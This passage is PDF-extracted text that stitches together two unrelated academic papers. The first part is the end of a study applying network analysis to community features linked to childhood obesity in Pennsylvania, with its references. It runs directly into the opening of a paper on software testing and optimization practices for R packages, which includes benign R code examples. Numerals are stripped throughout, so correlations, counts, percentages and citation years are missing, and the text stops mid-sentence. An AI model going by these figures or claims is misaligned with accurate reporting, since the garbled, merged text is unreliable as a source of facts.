the community features. the correlation between the degree of each feature and its correlation with the prevalence of childhood obe- sity is positive (r = . ), indicating that more ‘central’ variables have a stronger association with the out- come. for example, fresh fruit and vegetable stands per square mile has a low correlation with community obesity, and can be seen in figure as a variable far from the center of the network and with only a few weak ties into the rest of the network. discussion we applied network methodology in order to describe linkages between community features associated with obesity. we used network analysis to characterize the obesogenic environment: instead of treating individual features of communities in isolation, this method hon- ors the interactions and spatial co-occurrence that make up this landscape of obesity risk. this work suggests that (i) there are identifiable clusters of environmental features; (ii) that the level of connectivity and structure of features in the network may be informative; and (iii) that features more highly associated with obesity are more likely to be central in the network of community features. three clusters were identified in the overall network: a cluster of crime-related variables that was weakly linked into the main network, and food and land use and physical activity clusters, respectively. in communities strati- fied by prevalence of childhood obesity, the structure and overall connectivity of the network appeared to differ by level of obesity. not only are the values of these attributes different in the heaviest and thinnest communities, but also the patterns of connections are different. we also found that centrality alone, as measured by degree, is correlated with obesity. obesity-related features are therefore more tightly geographically clustered. this may be evidence of synergy between features of the obesogenic environ- ment, of non-independent features of communities that join forces to shape obesity risk. understanding and intervening on the drivers of the obesity epidemic is a challenge for obesity re- searchers and policy makers. obesity is complex and has multiple drivers at the individual, communi- ty, and state and national levels (huang et al., ). traditional methods such as regression models fail to account for interaction between multiple factors at multiple scales, the complexity and importance of contextual factors, and feedback loops and oth- er dynamic processes (hammond, ). although our work is preliminary, it suggests that systems ap- proaches to obesity may be useful for characterizing linkages among features of the environment. despite the recognition that environmental features of com- munities play a strong role in the obesity epidemic, network methods to characterize linkages between attributes of communities has been underutilized. the structure and strength of these linkages may provide evidence for geographic areas or types of clusters of features that would be most efficient for intervention. network methods, especially graphical methods, could be used to help set priorities for obesity-relat- ed interventions in communities. for example, food establishments exhibited both high centrality (as measured by degree) in our network and high cor- relation with childhood obesity (fig. ). using these network graphs (e.g., fig. ), we can narrow in on features such as these that may have far reaching effects, if intervened upon. this is consistent with the connections (insna) literature on ‘food swamps’ and ‘food deserts’ – but helps to prioritize interventions in this area because these features are more central. this could point to the effectiveness of intervening on such variables that are highly central in the network, and thus may have more far-reaching effects than intervention on less central variables. network methods may help identify such synergistic actors that could have large effects on obesity due to their connections to other variables. in particular, our work points toward possible inter- ventions regarding community-zoning policies. our network graphs show tight clusters of food-related (e.g., grocery and convenience stores, fast food and full-service restaurants) and land use (e.g., road block length, household density) features that are strongly correlated with obesity. restructuring the community environment may be a promising avenue for obesity prevention. considering communities to be complex systems where multiple interrelated phenomena act together to create an obesogenic environment, these methods also push us to con- sider intervening on not just the environmental fea- tures themselves, but also on the linkages between features. this is a new way to approach the obesity epidemic – by looking for factors that may be link- ing features, or that can be manipulated to disrupt harmful connections. for example, the crime-related cluster is more tightly linked to the network among communities with more childhood obesity. further research into the underlying causes of this linkage (and why it differs in communities stratified by child- hood obesity prevalence) may illuminate important drivers of the obesity epidemic. this work also has methodological implications for obesity research. future work should explore the mechanisms for how these clusters are associated with increased obesity prevalence, and whether inter- ventions on features in this network change the net- work structure itself. this future research should con- sider the relationships, or clustering, of these features. evaluating independent associations between any single feature and obesity rates would ignore the com- plex inter-relations this work has highlighted. other methods that acknowledge these clusters of features, such as latent variable methods (nau et al., ), may be more appropriate to honor the way that en- vironmental features cluster together and to uncover unobserved sources of the correlation observed in this network. we have data from a large and diverse geographic area that includes urban, rural, and suburban com- munities. however, this analysis is exploratory. we are not able to rule out the possibility that popula- tion density and development may be a common cause of many of the variables we selected. this is potentially a source of bias or a possible explana- tion for the clustering of features of the environment on which our study is based. it is widely recognized that obesity-related characteristics of communities are geographically correlated. the reasons for those correlations are not well understood. our results, we believe, support the utility of network methods for the study of environments that are not formed randomly, but which are shaped by diverse market and demo- graphic forces that may be important in driving spatial variation in obesity rates. conclusion network analysis may be a useful tool for evaluating obesogenic environments and other questions of interest in epidemiology. this preliminary analysis suggests that patterns of clustering and connections between features of the environment are important. land use and food features are strongly linked (espe- cially in ‘heavier’ communities), and features are more highly clustered in communities with higher average bmi. network methods can illuminate patterns of link- ages and key factors in obesogenic environments. network position (centrality) is correlated with aver- age bmi. ultimately, the goal of this type of analysis would be to identify highly connected community features that can be used as levers of intervention to reduce population rates of obesity. acknowledgements emily knapp was supported by the clinical research and epidemiology in diabetes and endocrinolo- gy training grant (t dk ). usama bilal was supported by a fellowship from the obra social la caixa and by a johns hopkins center for a livable future-lerner fellowship. bridget teevan burke was supported by the epidemiology and biostatistics of aging training grant (t ag ). data for this manuscript were collected as part of a project supported by grant number u hd from the eunice kennedy shriver national institute of child health and human development (nichd). the project is co-funded by the nichd and the office of behavioral and social sciences research (obssr). the content is solely the responsibility of the authors and does not necessarily represent the official views of the nichd or obssr. a network approach to understanding obesogenic environments for children in pennsylvania literature cited ali, m.m., amialchuk, a. and rizzo, j.a. . the in- fluence of body weight on social network ties among ad- olescents. economics and human biology ( ): – . ali, m.m., amialchuk, a., gao, s. and heiland, f. . adolescent weight gain and social networks: is there a contagion effect?. applied economics ( ): – . barabasi, a.l. . network medicine – from obesity to the ‘diseasome’. the new england journal of medicine ( ): – , doi: . /nejme . barabasi, a.l. . scale-free networks: a decade and beyond. science ( ): – . barabasi, a.l. . network science: luck or reason. nature ( ): – . barabasi, a.l. . network science. philo- sophical transactions of the royal society a mathe- matical physicla and engineering science ( ): . barrat, a., barthélemy, m., pastor-satorras, r. and vespignani, a. . the architecture of com- plex weighted networks. proceedings of the national academy of sciences of the united states of america ( ): – , doi: . /pnas. . berger, e., vega, n., vidal, h. and geloen, a. . gene network analysis leads to functional validation of pathways linked to cancer cell growth and survival. biotechnology journal ( ): – . blanchflower, d.g., landeghem, b. and oswald, a.j. . imitative obesity and relative utility. journal of the european economic association ( – ): – . brewis, a.a., hruschka, d.j. and wutich, a. . vulnerability to fat-stigma in women’s everyday rela- tionships. social science and medicine ( ): – . burke, m.a. and heiland, f. . social dynamics of obesity. economic inquiry ( ): – . chen, z. and zhang, w. . integrative analysis using module-guided random forests reveals corre- lated genetic factors related to mouse weight. plos computational biology ( ): e . christakis, n.a. and fowler, j.h. . the spread of obesity in a large social network over years. the new england journal of medicine ( ): – . crandall, c.s. . social contagion of binge eat- ing. journal of personality and social psychology ( ): – . csardi, g. and nepusz, t. . the igraph soft- ware package for complex network research. inter- journal complex systems , – . dallman, m.f., pecoraro, n., akana, s.f., la fleur, s.e., gomez, f., houshyar, h., bell, m.e., bhatnagar, s., laugero, k.d. and manalo, s. . chronic stress and obesity: a new view of ‘comfort food’. proceed- ings of natlional academy of science of the united states of america ( ): – . dallman, m.f., pecoraro, n.c., la fleur, s.e., warne, j.p., ginsberg, a.b., akana, s.f., laugero, k.c., houshyar, h., strack, a.m., bhatnagar, s. and bell, m.e. . glucocorticoids, chronic stress, and obesity. progress in brain research , – . de la haye, k., robins, g., mohr, p. and wilson, c. . homophily and contagion as explanations for weight similarities among adolescent friends. journal of adolescent health ( ): – . el-sayed, a.m., scarborough, p., seemann, l. and galea, s. . social network analysis and agent- based modeling in social epidemiology. epidemiologic perspectives and innovations ( ): . epskamp, s., cramer, a.o.j., waldorp, l.j., schmittmann, v.d. and borsboom, d. . qgraph: network visualizations of relationships in psychometric data. journal of statistical software ( ): – . finegood, d.t. . the complex systems science of obesity. in cawley, j. (ed.), the oxford handbook of social science of obesity, oxford university press, new york, – . fox, m.d., snyder, a.z., vincent, j.l., corbetta, m., van essen, d.c. and raichle, m.e. . the human brain is intrinsically organized into dynamic, anticorre- lated functional networks. proceedings of the national academy of sciences of the united states of america ( ): – , doi: . /pnas. . fruchterman, t.m.j. and reingold, e.m. . graph drawing by force-directed placement. software: practice and experience ( ): – , doi: . / spe. . galea, s., riddle, m. and kaplan, g.a. . causal thinking and complex system approaches in epide- miology. international journal of epidemiology ( ): – . gesell, s.b., tesdahl, e. and ruchman, e. . the distribution of physical activity in an after-school friendship network. pediatrics ( ): – , doi: . /peds. - . gill, r., datta, s. and datta, s. . differential network analysis in human cancer research. current pharmaceutical design ( ): – . goh, k.i., cusick, m.e., valle, d., childs, b., vidal, m. and barabasi, a.l. . the human disease net- work. proceedings of natlional academy of science of the united states of america ( ): – , doi: . /pnas. . hammond, r. . complex systems modeling for obesity research. preventing chronic disease ( ): – . connections (insna) hammond, r.a. . social influence and obesity. current opinion in endocrinology, diabetes and obe- sity ( ): – . hammond, r.a. and ornstein, j.t. . a model of social influence on body mass index. annals of the new york academy of science , – . hidalgo, c.a. and castañer, e.e. . the amenity space and the evolution of neighborhoods. arxiv: . [physics.soc-ph] hidalgo, c.a., blumm, n., barabasi, a.l. and chris- takis, n.a. . a dynamic network approach for the study of human phenotypes. plos computational biol- ogy ( ): e , doi: . /journal.pcbi. . hill, a.l., rand, d.g., nowak, m.a. and christakis, n.a. . infectious disease modeling of social con- tagion in networks. plos computational biology ( ): e . hill, j.o. and peters, j.c. . environmental con- tributions to the obesity epidemic. science ( ): – . huang, t.t., drewnosksi, a., kumanyika, s. and glass, t.a. . a systems-oriented multilevel frame- work for addressing obesity in the st century. pre- venting chronic disease ( ): a . jeong, h., mason, s.p., barabasi, a.l. and oltvai, z.n. . lethality and centrality in protein networks. nature ( ): – , doi: . / . leroux, j.s., moore, s. and dubé, l. . beyond the ‘i’ in the obesity epidemic: a review of social rela- tional and network interventions on obesity. journal of obesity , . mcglashan, j., johnstone, m., creighton, d., de la haye, k. and allender, s. . quantifying a sys- tems map: network analysis of a childhood obesity causal loop diagram. plos one ( ): e , doi: . /journal.pone. . marks, j., barnett, l.m., foulkes, c., hawe, p. and allender, s. . using social network analy- sis to identify key child care center staff for obesity prevention interventions: a pilot study. j obes , . mutation consequences and pathway analysis working group of the international cancer genome consortium . pathway and network analysis of cancer genomes. nature methods ( ): – . nau, c., ellis, h., huang, h., schwartz, b.s., hirsch, a., bailey-davis, l., kress, a.m., pollak, j. and glass, t.a. . exploring the forest instead of the trees: an innovative method for defining obesogenic and obeso- protective environments. health place , – , doi: . /j.healthplace. . . . newman, m.e.j. . modularity and community structure in networks. proceedings of the national academy of sciences of the united states of america ( ): – , doi: . /pnas. . pons, p. and latapy, m. . computing com- munities in large networks using random walks. in yolum, p., güngör, t., gürgen, f. and Özturan, c. (eds), computer and information sciences – iscis : proceedings of the th international symposium, istanbul, turkey, october – , springer, berlin, heidelberg, – . schwartz, b.s., stewart, w.f., godby, s., pollak, j., dewalle, j., larson, s., mercer, d.g. and glass, t.a. . body mass index and the built and social environments in children and adolescents using electronic health records. american journal of pre- ventive medicine ( ): e –e , doi: . /j.ame- pre. . . . simpkins, s.d., schaefer, d.r., price, c.d. and vest, a.e. . adolescent friendships, bmi, and physical activity: untangling selection and influence through longitudinal social network analysis. journal of research adolescence ( ): doi: . /j. - . . .x. stites, e.c., trampont, p.c., ma, z. and ravichan- dran, k.s. . network analysis of oncogenic ras activation in cancer. science ( ): – . swinburn, b., egger, g. and raza, f. . dissect- ing obesogenic environments: the development and application of a framework for identifying and prioritizing environmental interventions for obesity. preventive med- icine ( pt ): – , doi: . /pmed. . . zhang, b. and horvath, s. . a general frame- work for weighted gene co-expression network analy- sis. statistical applications in genetics and molecular biology epub . zhou, x., menche, j., barabasi, a.l. and sharma, a. . human symptoms-disease network. nature communication , , doi: . /ncomms . , network science software engineering principles to improve quality and performance of r software software engineering principles to improve quality and performance of r software seth russell , tellen d. bennett , and debashis ghosh , university of colorado data science to patient value, university of colorado anschutz medical campus, aurora, co, usa pediatric critical care, university of colorado school of medicine, aurora, co, usa department of biostatistics and informatics, colorado school of public health, aurora, co, usa abstract today’s computational researchers are expected to be highly proficient in using software to solve a wide range of problems ranging from processing large datasets to developing personalized treatment strategies from a growing range of options. researchers are well versed in their own field, but may lack formal training and appropriate mentorship in software engineering principles. two major themes not covered in most university coursework nor current literature are software testing and software optimization. through a survey of all currently available comprehensive r archive network packages, we show that reproducible and replicable software tests are frequently not available and that many packages do not appear to employ software performance and optimization tools and techniques. through use of examples from an existing r package, we demonstrate powerful testing and optimization techniques that can improve the quality of any researcher’s software. subjects computer education, data science, software engineering keywords unit testing, profiling, optimization, software engineering, r language, statistical computing, case study, reproducible research, data science introduction writing scientific software has progressed from the work of early pioneers to a range of computer professionals, computational researchers, and self-taught individuals. the educational discipline of computer science, standardized many years ago through recommendations from the association for computing machinery (acm) (atchison et al., ), has grown in breadth and depth over many years. software engineering, a discipline within computer science, “seeks to develop and use systematic models and reliable techniques to produce high-quality software. these software engineering concerns extend from theory and principles to development practices that are most visible to those outside the discipline” (the joint task force on computing curricula, ). as they gain sophistication, computational researchers, statisticians, and similar professionals need to advance their skills by adopting principles of software engineering. wilson et al. ( ) identified eight key areas where scientists can benefit from software engineering best practices. the term “best” as referenced in the previous cited work and others cited later refers to expert consensus based on knowledge and observational reporting of results from application of the practices. they provide a high-level description of eight important principles of software engineering that should how to cite this article russell s, bennett td, ghosh d. . software engineering principles to improve quality and performance of r software. peerj comput. sci. :e doi . /peerj-cs. submitted october accepted january published february corresponding author seth russell, seth.russell@ucdenver.edu academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright russell et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:seth.�russell@�ucdenver.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ “reduce the number of errors in scientific software, make it easier to reuse, and save the authors of the software time and effort that can used for focusing on the underlying scientific questions.” while their principles are still relevant and important today, there has not been enough progress in this endeavor, especially with respect to software testing and software optimization principles (wilson, ; nolan & padilla-parra, ). the acm/institute of electrical and electronics engineers recommendations for an undergraduate degree in software engineering describe a range of coursework and learning objectives. their guidelines call out specific knowledge areas that should be part of or guide all software engineering coursework. the major areas are: computer science fundamentals, math and engineering fundamentals, professional interactions/ communication, software modeling, requirement gathering, software design, verification, project processes, quality, and security (the joint task force on computing curricula, ). these major themes are not covered extensively outside software engineering and include such generally applicable items such as software verification, validation, testing, and computer science fundamentals (for example, software optimization, modeling, and requirement gathering). in addition to the need for further training, understanding the software lifecycle is necessary: the process of software development from ideation to delivery of code. the largest component of software’s lifecycle is maintenance. software maintenance costs are large and increasing (glass, ; dehaghani & hajrahimi, ; koskinen, ); some put maintenance at % of total software cost. the chief factor in software maintenance cost is the time of the people creating and using the software. from the recent trend on making research results reproducible and replicable, some recommend making code openly available to any who might wish to repeat or further analyze results (leek & peng, ). with the development of any software artifact, an important consideration for implementation should be maintenance. as research scientists tend to think of their software products as unique tools that will not be used regularly or for a long period, they often do not consider long term maintenance issues during the development phase (sandve et al., ; prins et al., ). while a rigorous and formal software engineering approach is not well suited to the standard lifecycle of research software (wilson, ), there are many techniques that can help to reduce cost of maintenance and speed development. while best practices such as the use of version control software, open access to data, software, and results are becoming more wide spread, other practices such as testing and optimization need further attention. in this paper, a brief survey of currently available r packages from the comprehensive r archive network (cran) will be used to show the continued need for software testing and optimization. source code for this analysis is freely available at https://github.com/magic-lantern/softwareengineeringprinciples. after the presentation of the current state of r packages, general advice on software testing and optimization will be presented. the r package “pccc: pediatric complex chronic conditions” (feinstein et al., ; dewitt et al., ) (pccc), available via cran and at https://github.com/cud v/pccc, is used for code examples in this article. pccc is a combined r and c++ implementation of the pediatric complex chronic conditions russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/magic-lantern/softwareengineeringprinciples https://github.com/cud v/pccc http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ software released as part of a series of research papers (feudtner, christakis & connell, ; feudtner et al., ). pccc takes as input a data set containing international statistical classification of diseases and related health problems (icd) ninth revision or tenth revision diagnosis and procedure codes and outputs which if any complex chronic conditions a patient has. analysis of r packages on cran testing of r packages in order to estimate the level of testing common among r software, we analyzed all r packages available through cran. although nolan & padilla-parra ( ) performed a similar analysis in the past, due to the rapid change in the cran as a whole, a reevaluation is necessary. at the time of nolan’s work, cran contained , packages; it now contains , . furthermore, the analysis by nolan had a few shortcomings that we have addressed in this analysis: there are additional testing frameworks for which we wanted to analyze their usage; not all testing frameworks and r packages store their test code in a directory named “tests”; only packages modified in the past years were reported—there are many commonly used r packages that have not been updated in the last years. although we address some shortcomings in analyzing r code for use of testing best practices, our choice of domain for analysis does have some limitations. not all research software is written in r; for those that do use r, not all software development results in a package published on cran. while other software languages have tools for testing, additional research would be needed to evaluate level of testing in those languages to see how it compares to this analysis. although care has been taken to identify standard testing use cases and practices for r, testing can be performed in-line through use of core functions such as stop() or stopifnot(). also, developers may have their own test cases they run while developing their software, but did not include them in the package made available on cran. unit tests can be considered executable documentation, a key method of conveying how to use software correctly (reese, ). published research that involves software is not as easy to access and evaluate for use of testing code as cran packages are. while some journals have standardized means for storing and sharing code, many leave the storing and sharing of code up to the individual author, creating an environment where code analysis would require significant manual effort. to analyze use of software testing techniques, we evaluated all cran packages on two different metrics: metric : in the source code of each package, search for non-empty testing directories using the regular expression pattern “[tt]est[̂/]�/.+”. all commonly used r testing packages (those identified for metric ) recommend placing tests in a directory by themselves, which we look for. metric : check for stated dependencies on one of the following testing packages: runit (burger, juenemann & koenig, ), svunit (grosjean, ), testit (xie, ), testthat (wickham, ), unitizer (gaslam, ), or unittest russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (lentin & hennessey, ). from the authors of these packages, it is recommended to list dependency (or dependencies) to a testing framework even though standard usage of a package may not require it. for the testing analysis, we used as the cutoff year for visualizations due to the low number of packages last updated prior to . as shown in fig. , the evaluation for the presence of a non-empty testing directory shows that there is an increasing trend in testing r packages, with % of packages updated in having some tests. table s contains the data used to generate fig. . as shown in fig. , reliance upon testing frameworks is increasing over time both in count and as a percentage of all packages. there packages that list dependencies on more than one testing framework (nine with dependencies on both runit and testthat, seven with dependencies on both testit and testthat), so the total number of packages shown in the histogram includes that are double counted. table s contains the data used to generate fig. . as the numbers from metric do not match the numbers of metric , some additional exploration is necessary. there are more packages identified from metric vs metric . there are , packages that do not list a dependency to a testing framework, but have a testing directory; for example, the package xlsx (dragulescu & arendt, ). some packages use a testing framework, but do not list it as a dependency; for example, the package redcapapi (nutter & lane, ). there are also packages that list a testing framework as a dependency, but do not contain a directory with tests. see tables s and s for more details. figure packages with non-empty testing directory. count of packages with files in standard testing directories by year a package was last updated. testing directory “yes” is determined by the presence of files matching the regular expression “[tt]est[̂/]�/.+”; if no matches are found for an r package, it is counted as a “no”. full-size doi: . /peerj-cs. /fig- russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ optimization of r packages in order to estimate the level of software optimization common among r software, we performed an analysis of all r packages available through cran. to analyze the use of software optimization tools and techniques, we evaluated all cran packages on two different metrics: metric : in the source code of each package, search for non-empty src directories using the regular expression pattern “src[̂/]�/.+”. by convention, packages using compiled code (c, c++, fortran) place those files in a “/src” directory. metric : check for stated dependencies on packages that can optimize, scale performance, or evaluate performance of a package. packages included in analysis are: dsl (feinerer, theussl & buchta, ), rcpp (eddelbuettel & balamuta, ), rcppparallel (allaire et al., a), rmpi (yu, ), sparkr (apache software foundation, ), batchtools (bischl et al., ), bench (hester, ), benchr (klevtsov, antonov & upravitelev, ), domc (calaway, analytics & weston, ), dompi (weston, ), doparallel (calaway et al., ), dosnow (calaway, corporation & weston, ), foreach (calaway, microsoft & weston, ), future (bengtsson, ), future.apply (bengtsson & r core team, ), microbenchmark (mersmann, ), parallel (r core team, ), paralleldist (eckert, ), parallelmap (bischl & lang, ), partools (matloff, ), profr (wickham, a), profvis (chang & luraschi, ), rbenchmark (kusnierczyk, eddelbuettel & hasselman, ), snow (tierney et al., ), sparklyr (luraschi et al., ), tictoc (izrailev, ). figure packages with testing framework dependency. count of dependencies on a testing package (runit, svunit, testit, testthat, unitizer, unittest) by year a package was last updated. packages with no stated dependency from their description file for one of the specified packages are listed as “none”. full-size doi: . /peerj-cs. /fig- russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for the optimization analysis, we used as the cutoff year for visualizations showing presence of a src directory due to the low number of currently available packages last updated prior to . for optimization related dependencies, in order to aid visual understanding, we used as the cutoff year and only showed those packages with or greater dependent packages in a given year. automatically analyzing software for evidence of optimization has similar difficulties to those mentioned previously related to automatically detecting the use of software testing techniques and tools. the best evidence of software optimization would be in the history of commits, unit tests that time functionality, and package bug reports. while all r packages have source code available, not all have development history available nor unit tests available. additionally, a stated dependency on one of the optimization packages listed could mean the package creators recommend using that along with their package, not that they are actually using it in their package. despite these shortcomings, it is estimated that presence of a src directory or the use of specific packages is an indication that some optimization effort was put into a package. as shown in fig. , the evaluation for the presence of a non-empty src directory shows that there is an increasing trend in using compiled code in r packages, by count. however, when evaluated as a percent of all r packages, the change has only been a slight increase over the last few years. table s contains the data used to generate fig. . as shown in fig. , in , rcpp is the most common optimization related dependency followed by parallel and foreach. those same packages have been the most popular for packages last updated during the entire period shown. there packages that list figure packages with non-empty src directory. count of packages with files in standard source directories that has code to be compiled by year a package was last updated. compiled directory “yes” is determined by the presence of files matching the regular expression “src[̂/]�/.+”; if no matches are found for an r package, it is counted as a “no”. full-size doi: . /peerj-cs. /fig- russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dependencies to more than one optimization framework ( with dependencies, w/ , w/ , w/ , w/ , w/ ), so the total number of packages shown in the histogram includes some that are double-counted. table s contains the data used to generate fig. . as the numbers from metric do not match the numbers of metric , some additional exploration is necessary. in terms of total difference, there are more packages using compiled code vs those with one of the searched for dependencies. there are , packages that do not list a dependency to one of the specified packages, but have a src directory for compiled code. there are packages that list a dependency to one of the specified packages but do not have a src directory. see tables s and s for more details. recommendations to improve quality and performance software testing whenever software is written as part of a research project, careful consideration should be given to how to verify that the software performs the desired functionality and produces the desired output. as with bench science, software can often have unexpected and unintended results due to minor or even major problems during the implementation process. software testing is a well-established component of any software development lifecycle (atchison et al., ) and should also be a key component of research software. as shown previously, even among r software packages intended to be shared figure packages with optimization framework dependency. count of dependencies on an optimi- zation related package, see “optimization of r packages” section for complete list, by year a package was last updated. packages with no stated dependency from their description file for one of the specified packages are listed as “none.” in order to aid visual understanding of top dependencies, we limited display to those packages that had or more dependent packages.full-size doi: . /peerj-cs. /fig- russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ with and used by others, the majority of r packages ( – % depending on metric) do not have tests that are made available with the package. various methodologies and strategies exist for software testing and validation as well as how to integrate software with a software development lifecycle. some common testing strategies are no strategy, ad hoc testing (agruss & johnson, ), test driven development (tdd) (beck & gamma, ). there are also common project methodologies where testing fits into the project lifecycle; two common examples are the waterfall project management methodology, where testing is a major phase that occurs at a specific point in time, and the agile project management methodology (beck et al., ), where there are many small iterations including testing. while a full discussion of various methods and strategies is beyond the scope of this article, three key concepts presented are: when to start testing, what to test, and how to test. key recommendations for when to test: � build tests before implementation. � test after functionality has been implemented. discussion: one of the popular movements in recent years has been to develop tests first and then implement code to meet desired functionality, a strategy called tdd. while the tdd strategy has done much to improve the focus of the software engineering world on testing, some have found that it does not work with all development styles (hansson, ; sommerville, ), and others have reported that it does not increase developer productivity, reduce overall testing effort, nor improve code quality in comparison to other testing methodologies (fucci et al., ). an approach that more closely matches the theoretically based software development cycle and flexible nature of research software is to create tests after a requirement or feature has been implemented (osborne et al., ; kanewala & bieman, ). as developing comprehensive tests of software functionality can be a large burden to accrue at a single point in time, a more pragmatic approach is to alternate between developing new functionality and designing tests to validate new functionality. similar to the agile software development strategy, a build/test cycle can allow for quick cycles of validated functionality that help to provide input into additional phases of the software lifecycle. key recommendations for what to test: � identify the most important or unique feature(s) of software being implemented. software bugs are found to follow a pareto or zipfian distribution. � test data and software configuration. � if performance is a key feature, build tests to evaluate performance. discussion: in an ideal world, any software developed would be accompanied by % test coverage validating all lines of code, all aspects of functionality, all input, and all interaction with other software. however, due to pressures of research, having time to build a perfect test suite is not realistic. a parsimonious application of the pareto principle russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ will go a long way towards improving overall software quality without adding to the testing burden. large companies such as microsoft have applied traditional scientific methods to the study of bugs and found that the pareto principle matches reality: % of bugs cause % of problems; additionally a zipfian distribution may apply as well: % of bugs cause % of all problems (rooney, ). to apply the pareto principle to testing, spend some time in a thought experiment to determine answers to questions such as: what is the most important feature(s) of this software? if this software breaks, what is the most likely bad outcome? for computationally intensive components—how long should this take to run? once answers to these questions are known, the developer(s) should spend time designing tests to validate key features, avoiding major negatives, and ensuring software performs adequately. optimization and performance recommendations are covered in the “software optimization” section. part of the test design process should include how to “test” more than just the code. some specific aspects of non-code tests include validation of approach and implementation choices with a mentor or colleague. as a brief example of how to apply the aforementioned testing principles, we provide some information on testing steps followed during the pccc package development process. the first tests written were those that were manually developed and manually run as development progressed. key test cases of this form are ideal candidates for inclusion in automated testing. the first tests were taking a known data set, running our process to identify how many of the input rows had complex chronic conditions, and then report on the total percentages found; this result was then compared with published values. # read in hcup kid database kid cols <- read_csv(“kid _core_columns.csv”) kid core <- read_fwf(“kid_ _core.asc”, fwf_positions( start = kid cols$start, end = kid cols$end, col_names = tolower(kid cols$name)), col_types = paste(rep(“c”, nrow(kid cols)), collapse = “”)) # output some summary information for manual inspection table(kid core$year) dim(kid core) n_distinct(kid core$recnum) # run process to identify complex chronic conditions kid_ccc <- ccc(kid core[, c( , : , : , : )], id = recnum, dx_cols = vars(starts_with(“dx”), starts_with(“ecode”)), russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ pc_cols = vars(starts_with(“pr”)), icdv = ) # output results for manual inspection kid_ccc # create summary statistics to compare to published values dplyr::summarize_at(kid_ccc, vars(-recnum), sum) %>% print.data.frame dplyr::summarize_at(kid_ccc, vars(-recnum), mean) %>% print.data.frame for the pccc package there is a large set of icd codes and code set patterns that are used to determine if an input record meets any complex chronic condition criteria. to validate the correct functioning of the software, we needed to validate the icd code groupings were correct and were mutually exclusive (as appropriate). as pccc is a re-implementation of existing sas and stata code, we needed to validate that the codes from the previously developed and published software applications were identical and were performing as expected. through a combination of manual review and automated comparison codes were checked to see if duplicates and overlaps existed. any software dealing with input validation or having a large amount of built-in values used for key functionality should follow a similar data validation process. as an example of configuration testing, here is a brief snippet of some of the code used to automatically find duplicates and codes that were already included as part of another code: icds <- input.file(“../pccc_validation/icd _codes_r.txt”) unlist(lapply(icds, function(i) { tmp <- icds[icds != i] output <- tmp[grepl(paste (“̂”, i, “.�”), tmp)] # add the matched element into the output if(length(output) != ) output <- c(i, output) output })) key recommendations for how to test: � software developer develops unit tests. � intended user of software should perform validation/acceptance tests. � run all tests regularly. � review key algorithms with domain experts. discussion: most programming languages have a multitude of testing tools and frameworks available for assisting developers with the process of testing software. due to the recurring patterns common across programming languages most languages have a russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ sunit (wikipedia contributors, a) derived testing tool, commonly referred to as an “xunit” (wikipedia contributors, b) testing framework that focuses on validating individual units of code along with necessary input and output meet desired requirements. based on software language used, unit tests may be at the class or function/procedure level. some common xunit style packages in r are runit and testthat. unit tests should be automated and run regularly to ensure errors are caught and addressed quickly. for r, it is easy to integrate unit tests into the package build process, but other approaches such as post-commit hook in a version control system are also common. in addition to unit tests, typically written by the developers of the software, users should perform acceptance tests, or high-level functionality tests that validate the software meets requirements. due to the high-level nature and subjective focus of acceptance tests, they are often manually performed and may not follow a regimented series of steps. careful documentation of how a user will actually use software, referred to as user stories, are translated into step by step tests that a human follows to validate the software works as expected. a few examples of acceptance testing tools that primarily focus gui aspects of software are: selenium (selenium contributors, ), microfocus unified functional testing (formely known as hp’s quicktest professional) (micro focus, ), and ranorex (ranorex gmbh, ). as research focused software often does not have a gui, one aide to manual testing processes is for developers of the software or expert users to create a full step by step example via an r markdown (allaire et al., b; xie, allaire & grolemund, ) notebook demonstrating use of the software followed by either manually or automatic validation that the expected end result is correct. in addition to the tool-based approaches already mentioned, other harder to test items such as algorithms and solution approach should be scrutinized as well. while automated tests can validate mathematical operations or other logic steps are correct, they cannot verify that the approach or assumptions implied through software operations are correct. this level of testing can be done through code review and design review sessions with others who have knowledge of the domain or a related domain. during development of the pccc package, after the initial tests shown in previous sections, further thought went into how the specifics of the desired functionality should perform. unit tests were developed to validate core functionality. we also spent time thinking about how the software might behave if the input data was incorrect or if parameters were not specified correctly. if an issue is discovered at this point, a common pattern is to create a test case for discovered bugs that are fixed—this ensures that a re-occurrence, known as a “regression” to software engineers, of this error does not happen again. in the case of pccc, developers expected large input comprised of many observations with many variables. when a tester accidentally just passed observation with many variables, the program crashed. the problem was discovered to be due to the flexible nature of the sapply() function returning different data types based on input. russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the original code from ccc.r: # check if call didn’t specify specific 